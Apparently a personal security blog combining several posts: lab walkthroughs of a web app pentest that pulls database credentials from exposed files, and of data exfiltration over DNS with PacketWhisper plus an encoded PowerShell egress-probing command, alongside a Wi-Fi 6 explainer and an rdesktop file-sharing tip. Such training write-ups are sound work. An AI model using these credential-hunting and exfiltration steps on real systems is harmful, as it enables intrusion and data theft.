Representation

You are a Penetration Tester hired by the company AwdMgmt to perform security tests on their internal Web Application and machines. You are asked to perform the penetration test on the client premises. During this engagement you are not given a well-defined scope. You are sitting in the client corporate building, directly attached to the client network.

Objective

The Objectives of this our moto is to first find the web servers in the network that you are directly attached with this. Then to test the Web Application running on it in order to check if you can access restricted areas (such as the login page)!

Tools

The best tools for this lab are -

# Dirbuster
# mysql
# Web browser

Follow the Step -

1) Find all the machines in the network

2) Identify the machines role

3) Explore the web application

4) Find hidden files

5) Test the credentials found

6) Retrieve the correct admin password

Solutions steps

Find all the machines in the network

We first need to find the address of the corporate network we are connected to. We can do so by running ifconfig and checking the IP address of our tap0 interface.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ifconfig           
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12329  bytes 1183972 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12329  bytes 1183972 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.104.11.50  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::8cfa:99ff:fe9b:3351  prefixlen 64  scopeid 0x20<link>
        ether 8e:fa:99:9b:33:51  txqueuelen 1000  (Ethernet)
        RX packets 4679  bytes 256538 (250.5 KiB)
        RX errors 0  dropped 2  overruns 0  frame 0
        TX packets 5763  bytes 321536 (314.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.6.25  netmask 255.255.255.0  broadcast 192.168.6.255
        inet6 2409:4064:e0b:64bf:9407:d0bc:70d9:cc95  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 95039  bytes 105443523 (100.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 56428  bytes 9346057 (8.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

As we can see the target network is 10.104.11.0/24. Let's run nmap with -sn option order to discover all the available hosts on the network.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sn 10.104.11.0/24 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:28 IST
Nmap scan report for 10.104.11.96
Host is up (0.61s latency).
MAC Address: 00:50:56:A5:F5:80 (VMware)
Nmap scan report for 10.104.11.198
Host is up (0.64s latency).
MAC Address: 00:50:56:A5:F5:80 (VMware)
Nmap scan report for 10.104.11.50
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 14.65 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

The previous command shows that there are only two hosts alive in the network: 10.104.11.96 and 0.104.11.198

Identify the machines role

Let us run nmap in order to gather information about the services listening on our targets. For this we will run a -sV scan as follows:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sV 10.104.11.96,198
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:29 IST
Nmap scan report for 10.104.11.96
Host is up (0.85s latency).                                                         
Not shown: 998 closed tcp ports (reset)                                        
PORT   STATE SERVICE VERSION                                       
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
MAC Address: 00:50:56:A5:03:17 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.104.11.198
Host is up (0.91s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.38-0+wheezy1
MAC Address: 00:50:56:A5:F5:80 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 143.46 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
└─$ 

From the results, we can see that the machine with IP address 10.104.11.96 is running Apache on port 80, meaning that it is probably hosting the internal web application, while the other machine (10.104.11.198) is running MySQL.

Since the scope of the engagement is to check if an attacker can access restricted areas of the web application, let's focus our tests on the machine 10.104.11.96.

Explore the web application

In order to inspect the web application we just need to type the IP address of the target machine into our browser.

If we inspect the web application, we can see that the \"Sign up\" page is not available, meaning that we cannot create a new user in order to access the restricted area.

Moreover, we do not have any valid credential to use and the form seems not vulnerable to any SQL injection attack.

Find hidden files

Since we do not want to bruteforce the login form, we can try to run discovery tools such as dirbuster in order to find hidden files that may help us with our goal.

Let us start dirbuster and run a scan using the directory-list-2.3.-small.txt file. After a minute or two, we should start getting some interesting results:

Here we can see that in the include folder there is a file named config.old. Let us inspect it and see if there is anything interesting in it:

As we can see, the file contains some database credentials! If you recall, in the previous steps we had found a machine running MySQL. Let us try a DB connection to this machine with the credentials just found:

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ mysql -u awd -pUcuijsQgGOFILdjdL8D -h 10.104.11.198
ERROR 1045 (28000): Access denied for user 'awd'@10.104.11.10' (using password: YES)
                                                                                                                                      
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$                                                                                                                             

>

Unfortunately, it seems that the credentials are not valid. Let us keep investigating the files found with dirbuster. If we check the previous screenshot, we can see that there is a page named signup.php that we were not able to access from the links in the web application:

This is even better than the previous file found!

Test the credentials found

Let us try the credentials found in the signup.php file and see if we are able to access the DB!

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
└─$                                                        130 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198               130 ⨯
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 241
Server version: 5.5.38-0+wheezy1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

As we can see, this time we are successfully logged into the database! Let us inspect it!

Retrieve the correct admin password

Let us use some simple mysql commands to navigate the database and check if there is anything interesting in it. First, we will have to select the database to use and then inspect its tables and data, as follows:

MySQL [(none)]> use awdmgmt_accounts;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [awdmgmt_accounts]> show tables;
+----------------------------+
| Tables_in_awdmgmt_accounts |
+----------------------------+
| accounts                   |
+----------------------------+
1 row in set (0.528 sec)

MySQL [awdmgmt_accounts]> select * from accounts;
+----+--------------------+----------+-------------+
| id | email              | password | displayname |
+----+--------------------+----------+-------------+
|  1 | admin@awdmgmt.labs | ENS7VvW8 | Admin       |
+----+--------------------+----------+-------------+
1 row in set (0.898 sec)

MySQL [awdmgmt_accounts]> 

With the information just obtained, let us try to log into the web application:

Disclaimer

Wifi 6

Hello Guys. In this blog we're going to talk about the 802.11ax wireless standard. Which is more commonly known as Wi-Fi 6. Now Wi-Fi 6 was released in 2019 and is the latest wireless standard that's used in wireless devices and is the successor to the 802.11ac Wi-Fi standard which is known as Wi-Fi 5.

Now Wi-Fi 6 is faster than Wi-Fi 5, however speed wasn't necessarily its main goal. The main goal of Wi-Fi 6 is not just an increase in speed but it was to make a Wi-Fi network perform better when a lot of devices are connected to it. And this is because today there are so many devices in our home that use Wi-Fi, such as computers, tablets, phones, security cameras, refrigerators, light switches, thermostats, and so much more. And with so many devices competing for the Wi-Fi signal, it can slow down a network because a Wi-Fi router can only communicate with so many devices at a time. 

So to meet this demand engineers developed Wi-Fi 6. So what are the differences between Wi-Fi 6 and Wi-Fi 5? Well one of those differences is obviously speed. The older Wi-Fi 5 had a maximum speed of 3.5 gigabits per second. But with Wi-Fi 6 that speed has been increased to 9.6 gigabits per second, which is a significant increase. Now keep in mind this increase in speed is shared across multiple devices. It does not mean that each of your devices will achieve this speed. And also this speed is on your local area network, meaning in your home or office. This does not mean that your internet speed will increase. However it  will make it seem like it's faster because of the technology that has been implemented in Wi-Fi 6. Now one of these technologies is orthogonal frequency-division multiple access or OFDMA.

Now this technology lowers latency and delivers data to multiple devices more   efficiently for example let's say that Wi-Fi transmissions act like carts that deliver data to Wi-Fi devices. And let's say you have three Wi-Fi devices. Now with the older Wi-Fi 5 a cart would deliver one piece of data to one device at a time.

So each Wi-Fi device would have to wait their turn to receive data. But with the newer Wi-Fi 6 each cart would carry three pieces of data that would deliver to each device at the same time. So with Wi-Fi 5 devices will have to wait their turn to receive data. But with Wi-Fi 6 they don't have to wait because they all receive data at the same time. So this makes more efficient use of data delivery which reduces lag and another technology that Wi-Fi 6 uses is MU-MIMO which stands for multiple-user, multiple-input, multiple-output. Now this technology first made its debut in Wi-Fi 5 version 2. And what this does is that it allows multiple wireless devices to communicate with a Wi-Fi router at the same time. Now before Wi-Fi 5 routers used SU-MIMO, which stands for Single-User MIMO. And this also allowed Wi-Fi routers to communicate with multiple devices but only with one device at a time. So each device will have to wait their turn to communicate with the router. But a router with MU-MIMO, all the devices that are connected won't have to wait their turn because this allows communication to multiple devices at the same time.  

It breaks up the internet bandwidth into individual streams and pushes it to the connected devices. So with this technology you'll see a significant improvement in the speed of your internet if you're doing things that require a lot of bandwidth such as streaming videos or downloading. So as I stated before MU-MIMO debuted in Wi-Fi 5 version 2, but it has improved in Wi-Fi 6. The difference is is that with Wi-Fi 5 it was only available in download and it can only support four simultaneous streams. But with Wi-Fi 6 it's available in both upload and download and it can support up to 12 simultaneous streams. And Wi-Fi 6 also has an improvement  in beamforming. Beamforming is a technique that sends transmissions in a specific direction  which strengthens the signal. But without beamforming, the transmission is sent in  every direction which can weaken the signal which is what happens in older routers. But with newer routers the signal is directed to the devices  that are connected to it. 

Wi-Fi 6 also has the ability to minimize interference from nearby networks. And it does this by using a technology called basic service set coloring. So for example when you have two Wi-Fi routers next to each other such as what happens with neighbors, the signals from the two networks can overlap and cause interference with the other signal. But Wi-Fi 6 with BSS coloring, it colors or marks the networks so it can distinguish another network from its own. It marks frames from nearby networks so that your router disregards them which
makes your Wi-Fi router more efficient because the less time a Wi-Fi router gets distracted the more responsive it can be. And as far as security, i-Fi 6 has the latest security protocol which is WPA3. WPA3 provides cutting edge security features that enable a more robust authentication that will increase protection from password guessing attempts.

And in order for a device to be Wi-Fi 6 certified it must have WPA3. Wi-Fi 6 also has the ability to extend the battery life in Wi-Fi devices. And it does this by using a technology called Target Wake Time. With Target Wake Time a router or an access point  schedules a time with Wi-Fi devices on when data is supposed to be sent or received. So according to that scheduled time when Wi-Fi devices are sending or receiving data, their antennas are powered on. But when they are not sending or receiving data they go into sleep mode and their antennas are powered off which saves battery life Now Wi-Fi routers will broadcast a wireless signal or frequency band so that wireless devices can connect to. And up until now they have been restricted to broadcasting two frequency bands. Which are 2.4 and 5 gigahertz. However with the new Wi-Fi 6E it'll broadcast a third band which is 6 gigahertz. The 6 gigahertz band opens up additional channels for delivering large amounts of data to Wi-Fi devices especially in crowded environments. These additional channels will result in a better network performance and a greater capacity to support more users. 

who would benefit from a Wi-Fi 6 router?

well if you have a lot of wireless devices, like perhaps 15 or more, then I would definitely recommend getting one especially if you have closer to 20 devices. Because you're going to see a big difference in the performance of your network. But you also have to keep in mind that in order to reap the full benefits of Wi-Fi 6, your devices must be compatible with Wi-Fi 6. 

Amazon Netgear wifi 6 router- https://amzn.to/30ymzoX

 

Disclaimer

File Transfer From Windows to Linux via rdesktop

The rdesktop tool is required for desktop management in a Windows box using Lyrics as the local machine you used.

Sometimes it's important to be able to exchange files from place to place using rdesktop even especially when there is no FTP service. It is our good fortune that we support file transfer mode using rdesktop tool.


Now, when connecting to Windows, we will use this kind of notation on the rdeskop arguments,

 

  
$ rdesktop  172.16.91.100 -r disk:linux=/home/hackerboy/Documents/ine-lab

 -f : this is not of importance in our case, it’s just for full screen mode, to enter and exit fullscreen mode, press Ctrl+Alt+Enter
 

 -r :  this is the remote share option. disk is one of the options available, this will create a disk on the network devices of the Windows box, named “linux” which will point to disk:linux=/home/hackerboy/Documents/ine-lab on our Linux box. Don’t forget that you need Windows XP and newer for this feature, and the device name is limited to 8 characters!


After connecting with these options, on your Windows box (via the rdesktop interface) go to this interface page...see the below..

Here you’ll find a device named linux on Kumar Atul Jaiswal, this is your /home/hackerboy/Documents/ine-lab folder!

The -r option of rdesktop support many redirections such as sound, printer,  clipboard and more. Check the manual pages for more detail.

Disclaimer

Try to exfiltrate an interesting file Practical

scheme

A client gives you remote desktop access to a machine and wants you to identify all the possible ways an attacker can exfiltrate data (that is - if he was able to compromise this machine) without changing any firewall setting.  Try to exfiltrate an interesting file Practical

If you are unfamiliar with the term exfiltration, please refer to the link below.

Click Here

Learning objectives

In this lab, you will learn how to:
 

1) Assess firewall settings

2) Leverage insufficiently secure firewall settings 

3) Encrypt interesting data and exfiltrate them using DNS 

4) Automatically identify all possible exfiltration ways



Recommended tools

1) Kali Linux

2) Packet Whisper (https://github.com/TryCatchHCF/PacketWhisper)

3) Wireshark

4) rdesktop (command line utility)

5) Egress framework (https://labs.mwrinfosecurity.com/blog/egress-checking)
 

Network configuration & credentials

Intranet Subnet: 172.16.91.0/24
Under-investigation machine's IP: 172.16.91.100
Connection Type: RDP


First you need to download openvpn file and run -


 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Documents/ine-lab]
└─$ sudo openvpn data-exfiltration.ovpn
2021-12-10 12:23:07 DEPRECATED OPTION: --cipher set to 'AES-128-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-128-CBC' to --data-ciphers or change --cipher 'AES-128-CBC' to --data-ciphers-fallback 'AES-128-CBC' to silence this warning.
2021-12-10 12:23:07 OpenVPN 2.5.1 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on May 14 2021
2021-12-10 12:23:07 library versions: OpenSSL 1.1.1l  24 Aug 2021, LZO 2.10
🔐 Enter Auth Username: ZzxVBe7hGAGyKa
🔐 Enter Auth Password: **************          
2021-12-10 12:23:18 TCP/UDP: Preserving recently used remote address: [AF_INET]69.46.7.227:42817
2021-12-10 12:23:18 Attempting to establish TCP connection with [AF_INET]69.46.7.227:42817 [nonblock]
2021-12-10 12:23:18 TCP connection established with [AF_INET]69.46.7.227:42817
2021-12-10 12:23:18 TCP_CLIENT link local: (not bound)
2021-12-10 12:23:18 TCP_CLIENT link remote: [AF_INET]69.46.7.227:42817
2021-12-10 12:23:21 [Hera Openvpn Cluster] Peer Connection Initiated with [AF_INET]69.46.7.227:42817
2021-12-10 12:23:23 TUN/TAP device tap0 opened
2021-12-10 12:23:23 net_iface_mtu_set: mtu 1500 for tap0
2021-12-10 12:23:23 net_iface_up: set tap0 up
2021-12-10 12:23:23 net_addr_v4_add: 172.16.91.10/24 dev tap0
2021-12-10 12:23:23 Initialization Sequence Completed

Username: aZsQDu1tFLwoTI
Password: F88ggxcZ3MNzoj

 
Use a Kali Linux or another penetration testing distribution virtual machine to connect to the 172.16.91.100 machine. You can do so by opening a terminal and executing the below:


# rdesktop  172.16.91.100 -r disk:linux=/home/hackerboy/Documents/ine-lab

For why we are using it (disk:linux=/home/hackerboy/Documents/ine-lab), we will know this further.

Credentials

Username: AdminELS
Password: Nu3pmkfyX
 

Tasks

Task 1: Connect to and scrutinize the 172.16.91.100 machine.
Task 2: Identify if the 172.16.91.100 machine allows any of the commonly used ports outbound connectivity.
Task 3: Try to exfiltrate an interesting file.
Task 4: Automate enumerating all the exfiltration paths and identify another one.


 

Solutions

Below, you can find solutions for each task.

Task 1: Connect to and scrutinize the 172.16.91.100 machine

Once you are connected to the 172.16.91.100 machine, launch "cmd.exe". First, search for interesting files, such as password.txt, credentials.txt, secrets.txt etc. by executing the following:

cd /

dir /s /b passwords.txt

dir /s /b credentials.txt

You will see, that a credentials.txt file exists inside theC:\Documents\Sensitive directory. This file contains a username and password.
 

While you are still inside the Windows terminal (cmd.exe), also check if there are any scripting languages installed. 

python --version

g++ -version

powershell ls
  
  

The successful execution of the above commands indicates that these scripting languages (Python and PowerShell) are actually installed (or allowed) on the 172.16.91.100 machine.

These scripting languages contain useful capabilities that can be leveraged by penetration testers during all phases of a penetration test.

Task 2: Identify if the 172.16.91.100 machine allows any of the commonly used ports outbound connectivity

To identify if the 172.16.91.100 machine allows any of the commonly used ports outbound connectivity, follow the procedures below.




For ports 80 (TCP), 443 (TCP), 8080 (TCP), 8443 (TCP) the procedure is as follows:

Launch a Python server specifying the port of choice, in your Kali machine.

In order to start a Python server, you need to launch a new terminal; go to a directory in Kali where you have files to be shared (for example /tmp), and then type:

# cd /tmp <- To navigate to the /tmp directory.

# python -m SimpleHTTPServer 8080.

The /tmp folder is a place where you can put files for a temporary time. The Linux OS itself uses this folder for placing temporary files.

As you can imagine, we will be testing if port 8080 (TCP) is allowed outbound internet connectivity by the 172.16.91.100 machine's firewall.

You should see something similar to the below screenshot: 

Identify the tap0 IP address of your Kali machine

To see the tap0 IP of your Kali machine, open a new terminal and execute the following:

1) Run Wireshark on your Kali machine.


In order to capture traffic from the lab's network, click on Capture and select Options, then you will click the "tap0" interface and finally press Start (as indicated in the screenshot below).

Configure the DNS server on the 172.16.91.100 machine to point to your Kali machine's tap0 IP (the same as previously used).

In order to change the DNS settings of the 172.16.91.100 machine, double click the Ethernet0 shortcut that is present on the AdminELS user's Desktop and then:


1) Select Properties
2) Choose Internet Protocol Version 4

From the Internet Protocol Version 4 (TCP/IPv4) Properties window:

1) Choose Properties
2) Insert your Kali's tap0 IP address as preferred DNS and click OK.

Launch a browser in windows, and try to navigate 172.16.91.10


Now, go to your Kali machine where you have started Wireshark. Observe the DNS traffic issued by the 172.16.91.100 machine. You should see something similar to the screenshot below.

To check ports 443 (TCP) and 8443 (TCP), perform steps 1-3, which are outlined above. Make sure you specify both the tap0 Kali IP and the port you are currently checking (which is bound by the Python Server) each time. You will identify that these ports are not allowed outbound connectivity.

For port 53 (UDP), the procedure is:

Note: If you were inside a real environment, you could simply launch Wireshark and see if you can "sniff" any DNS requests originating from the 172.16.91.100 machine. If this was the case, then port 53 (UDP) would have been allowed outbound connectivity.

Find below an example of such DNS requests (which are irrelevant to this lab, hence the unrelated IPs)

Such captured traffic means that the firewall allows DNS traffic outbound (port 53 UDP).

To summarize our activities thus far, we have identified that ports 8080 (TCP) and 53 (UDP) are allowed outbound connectivity.

Task 3: Try to exfiltrate an interesting file

Based on the ports you identified that are allowed outbound connectivity, the stealthier exfiltration way is through port 53 (UDP). PacketWhisper can help you easily exfiltrate data via DNS requests.

PacketWhisper is a Python-based tool, but luckily we identified that Python is installed on the 172.16.91.100 machine.

To begin, download PacketWhisper from github. On Kali Linux, there is a convenient way to do this by using "git clone". More specifically:

On your Kali machine, open a new terminal and execute the below.


The /tmp path is the one we chose for our machine. You can execute the commands above inside any directory you want.

For easier transfer, also download PacketWhisper as a zipped file as follows:

┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
└─$ sudo wget https://github.com/TryCatchHCF/PacketWhisper/archive/master.zip
[sudo] password for hackerboy: 
--2021-12-11 14:12:17--  https://github.com/TryCatchHCF/PacketWhisper/archive/master.zip
Resolving github.com (github.com)... 13.234.210.38
Connecting to github.com (github.com)|13.234.210.38|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/TryCatchHCF/PacketWhisper/zip/master [following]
--2021-12-11 14:12:24--  https://codeload.github.com/TryCatchHCF/PacketWhisper/zip/master
Resolving codeload.github.com (codeload.github.com)... 13.233.43.20
Connecting to codeload.github.com (codeload.github.com)|13.233.43.20|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘master.zip’

master.zip                              [                       <=>                                          ]  28.60M   972KB/s    in 37s      

2021-12-11 14:13:03 (795 KB/s) - ‘master.zip’ saved [29988645]

┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
└─$ ls
anydesk             ssh-nCKwBah2CZIz                                                                Temp-34b1d66c-22ba-4d1e-ac38-9cfc255a5e8e
dbus-cCi149VHMi     systemd-private-05e85aceec3c4a1487cd1d5119244ef5-colord.service-mCOWOf          Temp-37c3f3f2-4307-4b30-a482-090d458e3fd5
gimp                systemd-private-05e85aceec3c4a1487cd1d5119244ef5-haveged.service-IbYCHi         tracker-extract-3-files.1000
master.zip          systemd-private-05e85aceec3c4a1487cd1d5119244ef5-ModemManager.service-4cczij    tracker-extract-3-files.131
mozilla_hackerboy0  systemd-private-05e85aceec3c4a1487cd1d5119244ef5-systemd-logind.service-LZMqei  wireshark_tap0OL9LE1.pcapng
pulse-PKdhtXMmr18n  systemd-private-05e85aceec3c4a1487cd1d5119244ef5-tor@default.service-GDI7cj
runtime-root        systemd-private-05e85aceec3c4a1487cd1d5119244ef5-upower.service-NmDrlg
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
└─$ 

Finally, you can again point the browser on the 172.16.91.100 machine to your tap0 IP and port 8080 in order to download the tool.

Remember that the file you want to download must be in the directory inside which you started the Python server.

Now, you can download the compressed PacketWhisper to the desktop for easier access and unzip it by right-clicking on the archive.

(To save you time, we have already downloaded PacketWhisper for you and placed it on the AdminELS user's desktop)


Now it's time to use PacketWhisper. In order to run PacketWhisper:

1) Launch Wireshark on your Kali Machine again and use the "tap0" interface to listen.
2) Launch cmd.exe on the 172.16.91.100 machine and go to the PacketWhisper directory.
3) Copy the credentials.txt file to the PacketWhisper's directory.
4) Launch PacketWhisper.

First you need to extract the zip file in the same directory...as mentioned above the screenshot

Back to your Kali Linux, on Wireshark you should be able to see DNS queries to subdomains of cloudfront.net within the traffic:

Now, save the Wireshark capture file. Remember to use the .pcap format as per the below screenshot.

Next, copy the saved pcap file inside the PacketWhisper's directory (in this case it's named file.pcap)

Finally, open a new terminal and go to PacketWhisper's directory and execute the following.

************************ MAY-BE YOU GUYS NOW UNDERSTAND WHY I USED THIS COMMAND (disk:linux=/home/hackerboy/Documents/ine-lab) IN THE BEGINNING WITH rdesktop !!!!!!!!!!!!!!!!! ********************

Lets Go ahead...

python PacketWhisper.py

2

file.pcap

1

1

3

[enter]

The file should now be successfully decrypted. To view its content, you can execute the below, or double-click the decloaked.file file.

Task 4: Automate enumerating all the exfiltration paths and identify another one

During penetration tests, we need to automate a large portion of our commonly executed activities to save time.

Let's use the egresscheck framework to see how it can automate identifying the ports that are allowed outbound connectivity.

There might be another port which is allowed outbound connectivity that we missed.

To download and launch the egresscheck framework, execute the below inside any directory you want on your Kali machine.

# git clone https://github.com/stufus/egresscheck-framework.git

# cd egresscheck-framework/

# ./ecf.py

┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
└─$ sudo git clone https://github.com/stufus/egresscheck-framework.git       
[sudo] password for hackerboy: 
Cloning into 'egresscheck-framework'...
remote: Enumerating objects: 393, done.
remote: Total 393 (delta 0), reused 0 (delta 0), pack-reused 393
Receiving objects: 100% (393/393), 88.69 KiB | 216.00 KiB/s, done.
Resolving deltas: 100% (191/191), done.
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
└─$ cd egresscheck-framework
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
└─$ ls
ecf.py  LICENSE  README.md
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
└─$ 

You need to configure the tool by specifying:


#The tap0 IP of your Kali machine (TARGETIP)
#The 172.16.91.100 machine's IP (SOURCEIP)
#A port range (PORTS)
#The protocol (PROTOCOL)

┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/egresscheck-framework]
└─$ ./ecf.py          

       .mMMMMMm.             MMm    M   WW   W   WW   RRRRR
      mMMMMMMMMMMM.           MM   MM    W   W   W    R   R
     /MMMM-    -MM.           MM   MM    W   W   W    R   R
    /MMM.    _  \/  ^         M M M M     W W W W     RRRR
    |M.    aRRr    /W|        M M M M     W W W W     R  R
    \/  .. ^^^   wWWW|        M  M  M      W   W      R   R
       /WW\.  .wWWWW/         M  M  M      W   W      R    R
       |WWWWWWWWWWW/
         .WWWWWW.        EgressChecker Mini-Framework v0.1-pre2
                     stuart.morgan@mwrinfosecurity.com | @ukstufus


egresschecker> set PORTS 8500-9500
PORTS => 8500-9500 (1001 ports)

egresschecker>  set TARGETIP 172.16.91.10
TARGETIP => 172.16.91.10

egresschecker> set SOURCEIP 172.16.91.100
SOURCEIP => 172.16.91.100

egresschecker> set PROTOCOL tcp
PROTOCOL => TCP

egresschecker> generate powershell-cmd

Warning: The powershell code does not support multiple threads; it will generate packets asynchronously but on a single thread only.

Run the command below on the client machine:
powershell.exe -e JABpAHAAIAA9ACAAIgAxADcAMgAuADEANgAuADkAMQAuADEAMAAiAAoAJABwAHIAIAA9ACAAIgA4ADUAMAAwAC0AOQA1ADAAMAAiACAALQBzAHAAbABpAHQAIAAnACwAJwAKAGYAbwByAGUAYQBjAGgAIAAoACQAcAAgAGkAbgAgACQAcAByACkAIAB7AAoAIABpAGYAIAAoACQAcAAgAC0AbQBhAHQAYwBoACAAJwBeAFsAMAAtADkAXQArAC0AWwAwAC0AOQBdACsAJAAnACkAIAB7AAoAIAAgACQAcAByAGEAbgBnAGUAIAA9ACAAJABwACAALQBzAHAAbABpAHQAIAAnAC0AJwAKACAAIAAkAGgAaQBnAGgAIAA9ACAAJABwAHIAYQBuAGcAZQBbADEAXQAKACAAIAAkAGwAbwB3ACAAPQAgACQAcAByAGEAbgBnAGUAWwAwAF0ACgAgAH0AIABlAGwAcwBlAGkAZgAgACgAJABwACAALQBtAGEAdABjAGgAIAAnAF4AWwAwAC0AOQBdACsAJAAnACkAIAB7AAoAIAAgACQAaABpAGcAaAAgAD0AIAAkAHAACgAgACAAJABsAG8AdwAgAD0AIAAkAHAACgAgAH0AIABlAGwAcwBlACAAewAKACAAIAByAGUAdAB1AHIAbgAKACAAfQAKACAAZgBvAHIAIAAoACQAYwAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAbABvAHcAKQA7ACQAYwAgAC0AbABlACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBJAG4AdAAzADIAKAAkAGgAaQBnAGgAKQA7ACQAYwArACsAKQAgAHsACgAgACAAdAByAHkAIAB7AAoAIAAgACAAJAB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0AAoAIAAgACAAJAB0AC4AQgBlAGcAaQBuAEMAbwBuAG4AZQBjAHQAKAAkAGkAcAAsACAAJABjACwAIAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACAAIAAgACQAdAAuAEMAbABvAHMAZQAoACkACgAgACAAfQAKACAAIABjAGEAdABjAGgAIAB7ACAAfQAKACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAG0AIAAoADAALgAxACoAMQAwADAAMAApAAoAIAB9AAoAfQA=

Also written to: /tmp/egress_2021dec11_164823_HoaERD.bat

egresschecker> 






copy to this file in the same directory where you runned this rdesktop program directory

The generate powershell-cmd. we see above was executed in order to get a single PowerShell command that will help us automate the firewall assessment.


This encrypted command contains code that will make PowerShell try to access every port from the given range from the 172.16.91.100 machine on your Kali machine.

Before initiating this procedure on the 172.16.91.100 machine, the following requirements should be fulfilled:


#Transfer this command to the 172.16.91.100 machine
#Run Wireshark on your Kali Machine
#Execute the command on the 172.16.91.100 machine


You can transfer the command using the Python server, and port 8080 like you did previously.

To do so, first, go to the directory where the egresscheck framework generated a BAT file (see the purple text message in the image above)

Egresscheck informs you of this BAT file with a message, which will be similar to the one below:

"Also written to: /tmp/egress_2019jan16_125152_VNcIt8.bat"

To serve this file using the Python server, execute the following:

# cd tmp
# python -m SimpleHTTPServer 8080

Download the .bat file generated by the egress framework.

